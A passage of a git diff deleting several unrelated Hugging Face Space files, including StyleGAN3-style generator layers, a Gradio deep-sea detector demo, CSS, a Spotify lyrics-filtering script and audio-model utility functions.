keepdim=True) + 1e-8).rsqrt() - if self.c_dim > 0: - misc.assert_shape(c, [None, self.c_dim]) - y = self.embed(c.to(torch.float32)) - y = y * (y.square().mean(1, keepdim=True) + 1e-8).rsqrt() - x = torch.cat([x, y], dim=1) if x is not None else y - - # Execute layers. - for idx in range(self.num_layers): - x = getattr(self, f'fc{idx}')(x) - - # Update moving average of W. - if update_emas: - self.w_avg.copy_(x.detach().mean(dim=0).lerp(self.w_avg, self.w_avg_beta)) - - # Broadcast and apply truncation. 
- x = x.unsqueeze(1).repeat([1, self.num_ws, 1]) - if truncation_psi != 1: - x[:, :truncation_cutoff] = self.w_avg.lerp(x[:, :truncation_cutoff], truncation_psi) - return x - - def extra_repr(self): - return f'z_dim={self.z_dim:d}, c_dim={self.c_dim:d}, w_dim={self.w_dim:d}, num_ws={self.num_ws:d}' - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class SynthesisInput(torch.nn.Module): - def __init__(self, - w_dim, # Intermediate latent (W) dimensionality. - channels, # Number of output channels. - size, # Output spatial size: int or [width, height]. - sampling_rate, # Output sampling rate. - bandwidth, # Output bandwidth. - square, - ): - super().__init__() - self.w_dim = w_dim - self.channels = channels - self.square = square - if self.square: - self.size = np.broadcast_to(np.asarray(size), [2]) - else: - self.size = np.array([size // 2, size]) # [width, height] - self.sampling_rate = sampling_rate - self.bandwidth = bandwidth - - # Draw random frequencies from uniform 2D disc. - freqs = torch.randn([self.channels, 2]) - radii = freqs.square().sum(dim=1, keepdim=True).sqrt() - freqs /= radii * radii.square().exp().pow(0.25) - freqs *= bandwidth - phases = torch.rand([self.channels]) - 0.5 - - # Setup parameters and buffers. - self.weight = torch.nn.Parameter(torch.randn([self.channels, self.channels])) - self.affine = FullyConnectedLayer(w_dim, 4, weight_init=0, bias_init=[1,0,0,0]) - self.register_buffer('transform', torch.eye(3, 3)) # User-specified inverse transform wrt. resulting image. - self.register_buffer('freqs', freqs) - self.register_buffer('phases', phases) - - def forward(self, w): - # Introduce batch dimension. - transforms = self.transform.unsqueeze(0) # [batch, row, col] - freqs = self.freqs.unsqueeze(0) # [batch, channel, xy] - phases = self.phases.unsqueeze(0) # [batch, channel] - - # Apply learned transformation. 
- t = self.affine(w) # t = (r_c, r_s, t_x, t_y) - t = t / t[:, :2].norm(dim=1, keepdim=True) # t' = (r'_c, r'_s, t'_x, t'_y) - m_r = torch.eye(3, device=w.device).unsqueeze(0).repeat([w.shape[0], 1, 1]) # Inverse rotation wrt. resulting image. - m_r[:, 0, 0] = t[:, 0] # r'_c - m_r[:, 0, 1] = -t[:, 1] # r'_s - m_r[:, 1, 0] = t[:, 1] # r'_s - m_r[:, 1, 1] = t[:, 0] # r'_c - m_t = torch.eye(3, device=w.device).unsqueeze(0).repeat([w.shape[0], 1, 1]) # Inverse translation wrt. resulting image. - m_t[:, 0, 2] = -t[:, 2] # t'_x - m_t[:, 1, 2] = -t[:, 3] # t'_y - transforms = m_r @ m_t @ transforms # First rotate resulting image, then translate, and finally apply user-specified transform. - - # Transform frequencies. - phases = phases + (freqs @ transforms[:, :2, 2:]).squeeze(2) - freqs = freqs @ transforms[:, :2, :2] - - # Dampen out-of-band frequencies that may occur due to the user-specified transform. - amplitudes = (1 - (freqs.norm(dim=2) - self.bandwidth) / (self.sampling_rate / 2 - self.bandwidth)).clamp(0, 1) - - # Construct sampling grid. - theta = torch.eye(2, 3, device=w.device) - theta[0, 0] = 0.5 * self.size[0] / self.sampling_rate - theta[1, 1] = 0.5 * self.size[1] / self.sampling_rate - grids = torch.nn.functional.affine_grid(theta.unsqueeze(0), [1, 1, self.size[1], self.size[0]], align_corners=False) - - # Compute Fourier features. - x = (grids.unsqueeze(3) @ freqs.permute(0, 2, 1).unsqueeze(1).unsqueeze(2)).squeeze(3) # [batch, height, width, channel] - x = x + phases.unsqueeze(1).unsqueeze(2) - x = torch.sin(x * (np.pi * 2)) - x = x * amplitudes.unsqueeze(1).unsqueeze(2) - - # Apply trainable mapping. - weight = self.weight / np.sqrt(self.channels) - x = x @ weight.t() - - # Ensure correct shape. 
- x = x.permute(0, 3, 1, 2) # [batch, channel, height, width] - misc.assert_shape(x, [w.shape[0], self.channels, int(self.size[1]), int(self.size[0])]) - return x - - def extra_repr(self): - return '\n'.join([ - f'w_dim={self.w_dim:d}, channels={self.channels:d}, size={list(self.size)},', - f'sampling_rate={self.sampling_rate:g}, bandwidth={self.bandwidth:g}']) - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class SynthesisLayer(torch.nn.Module): - def __init__(self, - w_dim, # Intermediate latent (W) dimensionality. - is_torgb, # Is this the final ToRGB layer? - is_critically_sampled, # Does this layer use critical sampling? - use_fp16, # Does this layer use FP16? - - # Input & output specifications. - in_channels, # Number of input channels. - out_channels, # Number of output channels. - in_size, # Input spatial size: int or [width, height]. - out_size, # Output spatial size: int or [width, height]. - in_sampling_rate, # Input sampling rate (s). - out_sampling_rate, # Output sampling rate (s). - in_cutoff, # Input cutoff frequency (f_c). - out_cutoff, # Output cutoff frequency (f_c). - in_half_width, # Input transition band half-width (f_h). - out_half_width, # Output Transition band half-width (f_h). - - # Hyperparameters. - conv_kernel = 3, # Convolution kernel size. Ignored for final the ToRGB layer. - filter_size = 6, # Low-pass filter size relative to the lower resolution when up/downsampling. - lrelu_upsampling = 2, # Relative sampling rate for leaky ReLU. Ignored for final the ToRGB layer. - use_radial_filters = False, # Use radially symmetric downsampling filter? Ignored for critically sampled layers. - conv_clamp = 256, # Clamp the output to [-X, +X], None = disable clamping. - magnitude_ema_beta = 0.999, # Decay rate for the moving average of input magnitudes. 
- square = False, # default (False) is for rectangular images - ): - super().__init__() - self.w_dim = w_dim - self.is_torgb = is_torgb - self.is_critically_sampled = is_critically_sampled - self.use_fp16 = use_fp16 - self.in_channels = in_channels - self.out_channels = out_channels - self.square = square - if self.square: - self.in_size = np.broadcast_to(np.asarray(in_size), [2]) - self.out_size = np.broadcast_to(np.asarray(out_size), [2]) - else: - # self.in_size = np.array[in_size, in_size//2] - self.in_size = np.array([in_size // 2, in_size]) - # self.out_size = np.array[out_size, out_size//2] - self.out_size = np.array([out_size // 2, out_size]) - self.in_sampling_rate = in_sampling_rate - self.out_sampling_rate = out_sampling_rate - self.tmp_sampling_rate = max(in_sampling_rate, out_sampling_rate) * (1 if is_torgb else lrelu_upsampling) - self.in_cutoff = in_cutoff - self.out_cutoff = out_cutoff - self.in_half_width = in_half_width - self.out_half_width = out_half_width - self.conv_kernel = 1 if is_torgb else conv_kernel - self.conv_clamp = conv_clamp - self.magnitude_ema_beta = magnitude_ema_beta - - # Setup parameters and buffers. - self.affine = FullyConnectedLayer(self.w_dim, self.in_channels, bias_init=1) - self.weight = torch.nn.Parameter(torch.randn([self.out_channels, self.in_channels, self.conv_kernel, self.conv_kernel])) - self.bias = torch.nn.Parameter(torch.zeros([self.out_channels])) - self.register_buffer('magnitude_ema', torch.ones([])) - - # Design upsampling filter. - self.up_factor = int(np.rint(self.tmp_sampling_rate / self.in_sampling_rate)) - assert self.in_sampling_rate * self.up_factor == self.tmp_sampling_rate - self.up_taps = filter_size * self.up_factor if self.up_factor > 1 and not self.is_torgb else 1 - self.register_buffer('up_filter', self.design_lowpass_filter( - numtaps=self.up_taps, cutoff=self.in_cutoff, width=self.in_half_width*2, fs=self.tmp_sampling_rate)) - - # Design downsampling filter. 
- self.down_factor = int(np.rint(self.tmp_sampling_rate / self.out_sampling_rate)) - assert self.out_sampling_rate * self.down_factor == self.tmp_sampling_rate - self.down_taps = filter_size * self.down_factor if self.down_factor > 1 and not self.is_torgb else 1 - self.down_radial = use_radial_filters and not self.is_critically_sampled - self.register_buffer('down_filter', self.design_lowpass_filter( - numtaps=self.down_taps, cutoff=self.out_cutoff, width=self.out_half_width*2, fs=self.tmp_sampling_rate, radial=self.down_radial)) - - # Compute padding. - pad_total = (self.out_size - 1) * self.down_factor + 1 # Desired output size before downsampling. - pad_total -= (self.in_size + self.conv_kernel - 1) * self.up_factor # Input size after upsampling. - pad_total += self.up_taps + self.down_taps - 2 # Size reduction caused by the filters. - pad_lo = (pad_total + self.up_factor) // 2 # Shift sample locations according to the symmetric interpretation (Appendix C.3). - pad_hi = pad_total - pad_lo - self.padding = [int(pad_lo[0]), int(pad_hi[0]), int(pad_lo[1]), int(pad_hi[1])] - - def forward(self, x, w, noise_mode='random', force_fp32=False, update_emas=False): - assert noise_mode in ['random', 'const', 'none'] # unused - misc.assert_shape(x, [None, self.in_channels, int(self.in_size[1]), int(self.in_size[0])]) - misc.assert_shape(w, [x.shape[0], self.w_dim]) - - # Track input magnitude. - if update_emas: - with torch.autograd.profiler.record_function('update_magnitude_ema'): - magnitude_cur = x.detach().to(torch.float32).square().mean() - self.magnitude_ema.copy_(magnitude_cur.lerp(self.magnitude_ema, self.magnitude_ema_beta)) - input_gain = self.magnitude_ema.rsqrt() - - # Execute affine layer. - styles = self.affine(w) - if self.is_torgb: - weight_gain = 1 / np.sqrt(self.in_channels * (self.conv_kernel ** 2)) - styles = styles * weight_gain - - # Execute modulated conv2d. 
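The padding arithmetic in the constructor above can be checked with concrete numbers. The geometry below (a 2x upsampling layer with a 12-tap up filter and no downsampling) is made up for illustration:

```python
import numpy as np

# Hypothetical layer geometry: 26x26 input, 52x52 output, 3x3 conv,
# 2x upsampling (12-tap filter), identity downsampling path.
in_size, out_size = np.array([26, 26]), np.array([52, 52])
conv_kernel, up_factor, down_factor = 3, 2, 1
up_taps, down_taps = 12, 1

# Same arithmetic as in SynthesisLayer above.
pad_total  = (out_size - 1) * down_factor + 1         # desired size before downsampling
pad_total -= (in_size + conv_kernel - 1) * up_factor  # input size after upsampling
pad_total += up_taps + down_taps - 2                  # size reduction caused by the filters
pad_lo = (pad_total + up_factor) // 2                 # symmetric-interpretation shift
pad_hi = pad_total - pad_lo
padding = [int(pad_lo[0]), int(pad_hi[0]), int(pad_lo[1]), int(pad_hi[1])]
print(padding)
```

Note the asymmetry (`pad_lo` exceeds `pad_hi` by up to `up_factor`), which realizes the half-sample shift the comment about Appendix C.3 refers to.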
- dtype = torch.float16 if (self.use_fp16 and not force_fp32 and x.device.type == 'cuda') else torch.float32 - x = modulated_conv2d(x=x.to(dtype), w=self.weight, s=styles, - padding=self.conv_kernel-1, demodulate=(not self.is_torgb), input_gain=input_gain) - - # Execute bias, filtered leaky ReLU, and clamping. - gain = 1 if self.is_torgb else np.sqrt(2) - slope = 1 if self.is_torgb else 0.2 - x = filtered_lrelu.filtered_lrelu(x=x, fu=self.up_filter, fd=self.down_filter, b=self.bias.to(x.dtype), - up=self.up_factor, down=self.down_factor, padding=self.padding, gain=gain, slope=slope, clamp=self.conv_clamp) - - # Ensure correct shape and dtype. - misc.assert_shape(x, [None, self.out_channels, int(self.out_size[1]), int(self.out_size[0])]) - assert x.dtype == dtype - return x - - @staticmethod - def design_lowpass_filter(numtaps, cutoff, width, fs, radial=False): - assert numtaps >= 1 - - # Identity filter. - if numtaps == 1: - return None - - # Separable Kaiser low-pass filter. - if not radial: - f = scipy.signal.firwin(numtaps=numtaps, cutoff=cutoff, width=width, fs=fs) - return torch.as_tensor(f, dtype=torch.float32) - - # Radially symmetric jinc-based filter. 
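The separable branch of `design_lowpass_filter` above delegates to `scipy.signal.firwin`, which is roughly equivalent to tapering an ideal sinc response with a Kaiser window and normalizing the DC gain. A numpy-only sketch, with arbitrary illustrative parameters (the real code derives beta via `kaiser_atten`/`kaiser_beta` for the radial case):

```python
import numpy as np

# Windowed-sinc low-pass filter (illustrative parameters only; beta is
# picked by hand here rather than from a stopband-attenuation target).
numtaps, cutoff, fs = 13, 8.0, 32.0
n = np.arange(numtaps) - (numtaps - 1) / 2   # tap positions centered at 0
h = np.sinc(2 * cutoff / fs * n)             # ideal low-pass impulse response
h *= np.kaiser(numtaps, 6.0)                 # taper to control ripple
h /= h.sum()                                 # normalize DC gain to 1
print(h.shape, float(h.sum()))
```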
- x = (np.arange(numtaps) - (numtaps - 1) / 2) / fs - r = np.hypot(*np.meshgrid(x, x)) - f = scipy.special.j1(2 * cutoff * (np.pi * r)) / (np.pi * r) - beta = scipy.signal.kaiser_beta(scipy.signal.kaiser_atten(numtaps, width / (fs / 2))) - w = np.kaiser(numtaps, beta) - f *= np.outer(w, w) - f /= np.sum(f) - return torch.as_tensor(f, dtype=torch.float32) - - def extra_repr(self): - return '\n'.join([ - f'w_dim={self.w_dim:d}, is_torgb={self.is_torgb},', - f'is_critically_sampled={self.is_critically_sampled}, use_fp16={self.use_fp16},', - f'in_sampling_rate={self.in_sampling_rate:g}, out_sampling_rate={self.out_sampling_rate:g},', - f'in_cutoff={self.in_cutoff:g}, out_cutoff={self.out_cutoff:g},', - f'in_half_width={self.in_half_width:g}, out_half_width={self.out_half_width:g},', - f'in_size={list(self.in_size)}, out_size={list(self.out_size)},', - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}']) - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class SynthesisNetwork(torch.nn.Module): - def __init__(self, - w_dim, # Intermediate latent (W) dimensionality. - img_resolution, # Output image resolution. - img_channels, # Number of color channels. - square, - channel_base = 32768, # Overall multiplier for the number of channels. - channel_max = 512, # Maximum number of channels in any layer. - num_layers = 14, # Total number of layers, excluding Fourier features and ToRGB. - num_critical = 2, # Number of critically sampled layers at the end. - first_cutoff = 2, # Cutoff frequency of the first layer (f_{c,0}). - first_stopband = 2**2.1, # Minimum stopband of the first layer (f_{t,0}). - last_stopband_rel = 2**0.3, # Minimum stopband of the last layer, expressed relative to the cutoff. - margin_size = 10, # Number of additional pixels outside the image. - output_scale = 0.25, # Scale factor for the output image. - num_fp16_res = 4, # Use FP16 for the N highest resolutions. 
- **layer_kwargs, # Arguments for SynthesisLayer. - - ): - super().__init__() - self.w_dim = w_dim - self.num_ws = num_layers + 2 - self.img_resolution = img_resolution - self.img_channels = img_channels - self.num_layers = num_layers - self.num_critical = num_critical - self.margin_size = margin_size - self.output_scale = output_scale - self.num_fp16_res = num_fp16_res - self.square = square - - # Geometric progression of layer cutoffs and min. stopbands. - last_cutoff = self.img_resolution / 2 # f_{c,N} - last_stopband = last_cutoff * last_stopband_rel # f_{t,N} - exponents = np.minimum(np.arange(self.num_layers + 1) / (self.num_layers - self.num_critical), 1) - cutoffs = first_cutoff * (last_cutoff / first_cutoff) ** exponents # f_c[i] - stopbands = first_stopband * (last_stopband / first_stopband) ** exponents # f_t[i] - - # Compute remaining layer parameters. - sampling_rates = np.exp2(np.ceil(np.log2(np.minimum(stopbands * 2, self.img_resolution)))) # s[i] - half_widths = np.maximum(stopbands, sampling_rates / 2) - cutoffs # f_h[i] - sizes = sampling_rates + self.margin_size * 2 - sizes[-2:] = self.img_resolution - channels = np.rint(np.minimum((channel_base / 2) / cutoffs, channel_max)) - channels[-1] = self.img_channels - - # Construct layers. 
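The layer-parameter recipe above (geometric interpolation of cutoffs and stopbands, with sampling rates rounded up to powers of two) runs standalone. The toy configuration below (6 layers, 64-pixel output) is for illustration only, much smaller than the defaults:

```python
import numpy as np

# Toy configuration, far smaller than the 14-layer default above.
num_layers, num_critical = 6, 2
img_resolution = 64
first_cutoff, first_stopband, last_stopband_rel = 2, 2**2.1, 2**0.3

last_cutoff = img_resolution / 2                       # f_{c,N}
last_stopband = last_cutoff * last_stopband_rel        # f_{t,N}
exponents = np.minimum(np.arange(num_layers + 1) / (num_layers - num_critical), 1)
cutoffs = first_cutoff * (last_cutoff / first_cutoff) ** exponents      # f_c[i]
stopbands = first_stopband * (last_stopband / first_stopband) ** exponents  # f_t[i]
sampling_rates = np.exp2(np.ceil(np.log2(np.minimum(stopbands * 2, img_resolution))))

print(cutoffs)         # rises geometrically, then holds at img_resolution / 2
print(sampling_rates)  # power-of-two rates, capped at img_resolution
```

The `min(..., 1)` on the exponents is what pins the last `num_critical` layers to the final cutoff, making them critically sampled.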
- self.input = SynthesisInput( - w_dim=self.w_dim, channels=int(channels[0]), size=int(sizes[0]), - sampling_rate=sampling_rates[0], bandwidth=cutoffs[0], square=self.square) - self.layer_names = [] - for idx in range(self.num_layers + 1): - prev = max(idx - 1, 0) - is_torgb = (idx == self.num_layers) - is_critically_sampled = (idx >= self.num_layers - self.num_critical) - use_fp16 = (sampling_rates[idx] * (2 ** self.num_fp16_res) > self.img_resolution) - layer = SynthesisLayer( - w_dim=self.w_dim, is_torgb=is_torgb, is_critically_sampled=is_critically_sampled, use_fp16=use_fp16, - in_channels=int(channels[prev]), out_channels= int(channels[idx]), - in_size=int(sizes[prev]), out_size=int(sizes[idx]), - in_sampling_rate=int(sampling_rates[prev]), out_sampling_rate=int(sampling_rates[idx]), - in_cutoff=cutoffs[prev], out_cutoff=cutoffs[idx], - in_half_width=half_widths[prev], out_half_width=half_widths[idx], - square=self.square, - **layer_kwargs) - name = f'L{idx}_{layer.out_size[0]}_{layer.out_channels}' - setattr(self, name, layer) - self.layer_names.append(name) - - def forward(self, ws, **layer_kwargs): - misc.assert_shape(ws, [None, self.num_ws, self.w_dim]) - ws = ws.to(torch.float32).unbind(dim=1) - - # Execute layers. - x = self.input(ws[0]) - for name, w in zip(self.layer_names, ws[1:]): - x = getattr(self, name)(x, w, **layer_kwargs) - if self.output_scale != 1: - x = x * self.output_scale - - # Ensure correct shape and dtype. 
- if self.square: - misc.assert_shape(x, [None, self.img_channels, self.img_resolution, self.img_resolution]) - else: - misc.assert_shape(x, [None, self.img_channels, self.img_resolution, self.img_resolution // 2]) - x = x.to(torch.float32) - return x - - def extra_repr(self): - return '\n'.join([ - f'w_dim={self.w_dim:d}, num_ws={self.num_ws:d},', - f'img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d},', - f'num_layers={self.num_layers:d}, num_critical={self.num_critical:d},', - f'margin_size={self.margin_size:d}, num_fp16_res={self.num_fp16_res:d}']) - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class Generator(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality. - c_dim, # Conditioning label (C) dimensionality. - w_dim, # Intermediate latent (W) dimensionality. - img_resolution, # Output resolution. - square, - img_channels, # Number of output color channels. - mapping_kwargs = {}, # Arguments for MappingNetwork. - **synthesis_kwargs, # Arguments for SynthesisNetwork. 
- ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.img_resolution = img_resolution - self.img_channels = img_channels - self.square = square - self.synthesis = SynthesisNetwork(w_dim=w_dim, img_resolution=img_resolution, img_channels=img_channels, square=self.square, **synthesis_kwargs) - self.num_ws = self.synthesis.num_ws - self.mapping = MappingNetwork(z_dim=z_dim, c_dim=c_dim, w_dim=w_dim, num_ws=self.num_ws, **mapping_kwargs) - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False, **synthesis_kwargs): - ws = self.mapping(z, c, truncation_psi=truncation_psi, truncation_cutoff=truncation_cutoff, update_emas=update_emas) - img = self.synthesis(ws, update_emas=update_emas, **synthesis_kwargs) - return img - -#---------------------------------------------------------------------------- diff --git a/spaces/FathomNet/UWROV_Deepsea_Detector/app.py b/spaces/FathomNet/UWROV_Deepsea_Detector/app.py deleted file mode 100644 index 43c4a41f65adc5e1d82edbddca2237b0a63081fa..0000000000000000000000000000000000000000 --- a/spaces/FathomNet/UWROV_Deepsea_Detector/app.py +++ /dev/null @@ -1,38 +0,0 @@ -import glob -import gradio as gr -from inference import * -from PIL import Image - - -def gradio_app(image_path): - """A function that sends the file to the inference pipeline and filters - some predictions before outputting to the Gradio interface.""" - - predictions = run_inference(image_path) - - out_img = Image.fromarray(predictions.render()[0]) - - return out_img - - -title = "UWROV Deepsea Detector" -description = "Gradio demo for UWROV Deepsea Detector: Developed by Peyton " \ - "Lee, Neha Nagvekar, and Cassandra Lam as part of the " \ - "Underwater Remotely Operated Vehicles Team (UWROV) at the " \ - "University of Washington. Deepsea Detector is built on " \ - "MBARI's Monterey Bay Benthic Object Detector, which can also " \ - "be found in FathomNet's Model Zoo. 
The model is trained on " \ - "data from NOAA Ocean Exploration and FathomNet, " \ - "with assistance from WoRMS for organism classification. All " \ - "the images and associated annotations we used can be found in " \ - "our Roboflow project. " - -examples = glob.glob("images/*.png") - -gr.Interface(gradio_app, - inputs=[gr.inputs.Image(type="filepath")], - outputs=gr.outputs.Image(type="pil"), - enable_queue=True, - title=title, - description=description, - examples=examples).launch() \ No newline at end of file diff --git a/spaces/Fernando22/freegpt-webui/client/css/stop-generating.css b/spaces/Fernando22/freegpt-webui/client/css/stop-generating.css deleted file mode 100644 index 3c2010d25065fbef63b104df743ef72c00259871..0000000000000000000000000000000000000000 --- a/spaces/Fernando22/freegpt-webui/client/css/stop-generating.css +++ /dev/null @@ -1,38 +0,0 @@ -.stop-generating { - position: absolute; - bottom: 128px; - left: 50%; - transform: translateX(-50%); - z-index: 1000000; -} - -.stop-generating button { - backdrop-filter: blur(20px); - -webkit-backdrop-filter: blur(20px); - background-color: var(--blur-bg); - color: var(--colour-3); - cursor: pointer; - animation: show_popup 0.4s; -} - -@keyframes show_popup { - from { - opacity: 0; - transform: translateY(10px); - } -} - -@keyframes hide_popup { - to { - opacity: 0; - transform: translateY(10px); - } -} - -.stop-generating-hiding button { - animation: hide_popup 0.4s; -} - -.stop-generating-hidden button { - display: none; -} diff --git a/spaces/Francesco/FairytaleDJ/scripts/keep_only_lyrics_on_spotify.py b/spaces/Francesco/FairytaleDJ/scripts/keep_only_lyrics_on_spotify.py deleted file mode 100644 index fc0e4a54c13bf2a8e657afa53d9166bb4c2b7342..0000000000000000000000000000000000000000 --- a/spaces/Francesco/FairytaleDJ/scripts/keep_only_lyrics_on_spotify.py +++ /dev/null @@ -1,51 +0,0 @@ -""" -This script will keep only the songs that are in the Spotify "Disney Hits" playlist -""" -from dotenv import 
load_dotenv - -load_dotenv() -import json -from collections import defaultdict - -import spotipy -from spotipy.oauth2 import SpotifyClientCredentials - -name = "Disney hits" - -spotify = spotipy.Spotify(auth_manager=SpotifyClientCredentials()) -results = spotify.search(q="playlist:" + name, type="playlist", limit=5) -items = results["playlists"]["items"] - -uri = "spotify:playlist:37i9dQZF1DX8C9xQcOrE6T" -playlist = spotify.playlist(uri) - -with open("data/lyrics.json", "r") as f: - data = json.load(f) - -spotify_tracks = {} - -for item in playlist["tracks"]["items"]: - track = item["track"] - track_name = track["name"].lower().split("-")[0].strip() - print(track_name) - spotify_tracks[track_name] = { - "id": track["id"], - "embed_url": f"https://open.spotify.com/embed/track/{track['id']}?utm_source=generator", - } - -# here we add only songs that are in the Disney spotify playlist - -data_filtered = defaultdict(list) -tot = 0 -for movie, lyrics in data.items(): - for lyric in lyrics: - name = lyric["name"].lower() - if name in spotify_tracks: - data_filtered[movie].append( - {**lyric, **{"embed_url": spotify_tracks[name]["embed_url"]}} - ) - tot += 1 -print(tot) - -with open("data/lyrics_with_spotify_url.json", "w") as f: - json.dump(data_filtered, f) diff --git a/spaces/Fu-chiang/skintest/README.md b/spaces/Fu-chiang/skintest/README.md deleted file mode 100644 index e4df640850ff6edeaf25c715092ad032ee05fc1f..0000000000000000000000000000000000000000 --- a/spaces/Fu-chiang/skintest/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Skintest -emoji: 📉 -colorFrom: gray -colorTo: green -sdk: gradio -sdk_version: 3.47.1 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/GIZ/SDSN-demo/appStore/__init__.py b/spaces/GIZ/SDSN-demo/appStore/__init__.py deleted file mode 100644 index 
07c25e5348471a19c24ca6468ee403b472c68906..0000000000000000000000000000000000000000 --- a/spaces/GIZ/SDSN-demo/appStore/__init__.py +++ /dev/null @@ -1 +0,0 @@ -# creating appstore package \ No newline at end of file diff --git a/spaces/Goutam982/RVC_V2_voice_clone/lib/infer_pack/commons.py b/spaces/Goutam982/RVC_V2_voice_clone/lib/infer_pack/commons.py deleted file mode 100644 index 54470986f37825b35d90d7efa7437d1c26b87215..0000000000000000000000000000000000000000 --- a/spaces/Goutam982/RVC_V2_voice_clone/lib/infer_pack/commons.py +++ /dev/null @@ -1,166 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size * dilation - dilation) / 2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += ( - 0.5 * (torch.exp(2.0 * logs_p) + ((m_p - m_q) ** 2)) * torch.exp(-2.0 * logs_q) - ) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def slice_segments2(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + 
segment_size - ret[i] = x[i, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d(length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = math.log(float(max_timescale) / float(min_timescale)) / ( - num_timescales - 1 - ) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment - ) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def 
convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2, 3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1.0 / norm_type) - return total_norm diff --git a/spaces/Gradio-Blocks/CBNetV2/model.py b/spaces/Gradio-Blocks/CBNetV2/model.py deleted file mode 100644 index 7a7db3c162ace926fd58a63c4a84b8d0f6855ac8..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/CBNetV2/model.py +++ /dev/null @@ -1,143 +0,0 @@ -from __future__ import annotations - -import os -import pathlib -import shlex -import subprocess -import sys - -if os.getenv('SYSTEM') == 'spaces': - import mim - - 
